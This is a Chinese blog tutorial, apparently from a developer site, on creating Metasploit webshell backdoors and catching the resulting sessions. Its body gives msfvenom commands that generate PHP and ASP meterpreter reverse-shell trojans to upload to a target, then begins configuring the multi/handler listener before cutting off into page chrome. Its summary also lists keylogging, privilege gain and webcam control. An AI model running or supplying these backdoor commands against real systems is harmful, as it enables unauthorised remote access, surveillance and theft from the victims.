MSF建立webshell后门,并监听端口建立session连接

本文详细介绍了如何使用Metasploit框架创建PHP和ASP反弹型后门,以及如何设置监听端口建立Meterpreter会话。通过keyscan_start监控目标键盘输入,迁移进程,获取用户权限,执行系统命令,下载和上传文件,甚至控制摄像头等高级操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

   建立反弹后门

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php

 

注:生成的反弹木马存放在当前用户home目录下;

将生成的木马上传到目标机中,可以远程访问;

windowsasp反弹木马:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp

 

 

 

 

 

 

监听端口建立会话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windowsphp

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值